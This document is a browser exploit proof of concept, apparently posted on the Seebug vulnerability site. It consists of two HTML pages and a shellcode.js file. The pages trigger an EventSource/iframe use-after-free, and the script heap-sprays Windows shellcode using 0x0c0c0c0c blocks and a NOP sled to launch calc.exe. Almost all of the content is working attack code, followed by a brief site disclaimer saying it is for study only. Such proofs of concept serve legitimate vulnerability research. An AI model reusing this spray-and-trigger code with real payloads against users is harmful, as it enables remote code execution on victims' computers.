<!--test2.html--> <html> <body> <script> top.source = new EventSource("aaat.htm"); top.source.onerror = function(err) { top.finish(); }; </script> </body> </html> ---------------- <!--test.html--> <html> <body> <iframe id="test" width="1" height="1"> </iframe> <script type="text/javascript" src="shellcode.js"></script> <script> var source; shellcode(); function timer(){ over(); } function runTest(){ document.getElementById("test").src = "test2.html"; } function finish(){ document.body.removeChild(document.getElementById("test")); setTimeout(timer,1000); //gc(); } runTest(); </script> <A HREF="test.html"> go </A> </body> <html> ---------------- //shellcode.js function gc() { if (typeof GCController !== "undefined") GCController.collect(); else { function gcRec(n) { if (n < 1) return {}; var temp = {i: "ab" + i + (i / 100000)}; temp += "foo"; gcRec(n-1); } for (var i = 0; i < 1000; i++) gcRec(10) } } function shellcode() { var shell = unescape("%u6060%u96e9%u0000%u5600%uc931%u8b64%u3071%u768B%u8b0C%u1c76%u468b%u8b08%u207e%u368b%u3966%u184f%uf275%uc35e%u8b60%u246c%u8b24%u3c45%u548b%u7805%uea01%u4a8b%u8b18%u205a%ueb01%u37e3%u8b49%u8b34%uee01%uff31%uc031%uacfc%uc084%u0a74%ucfc1%u010d%ue9c7%ufff1%uffff%u7c3b%u2824%ude75%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u89e8%u2444%u611c%uadc3%u5250%ua7e8%uffff%u89ff%u8107%u08c4%u0000%u8100%u04c7%u0000%u3900%u75ce%uc3e6%u19e8%u0000%u9800%u8afe%u7e0e%ue2d8%u8173%u00ec%u0000%u8900%ue8e5%uff5d%uffff%uc289%ue2eb%u8d5e%u047d%uf189%uc181%u0008%u0000%ub6e8%uffff%uebff%u5b0e%uc031%u5350%u55ff%u9004%u6161%uc031%ue8c3%uffed%uffff%u6163%u636c%u652e%u6578%u0000"); var block = unescape("%u0c0c%u0c0c"); var nops = unescape("%u9090%u9090%u9090"); while (block.length <0x4000) block += block; block=block.substring(0x90); memory = new Array(1000); var shellstr=new Array(3); shellstr[0]=block; shellstr[1]=nops; shellstr[2]=shell; var i; for (i=0;i<0x1000;i++) memory[i] =shellstr.join(""); } function over(){ var str=unescape("%u0c0c%u0c0c"); var str=unescape("%u0c0c%u0c0c"); strb=""; for(i=0;i<0x10000;++i){ if(i<0x40) strb=strb+str; var sdiv=document.createElement("div"); sdiv.innerText=strb; if(source.readyState==0x0c0c0c0c) { //alert("over ok! run calc.exe!"); url=source.URL; } } }
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论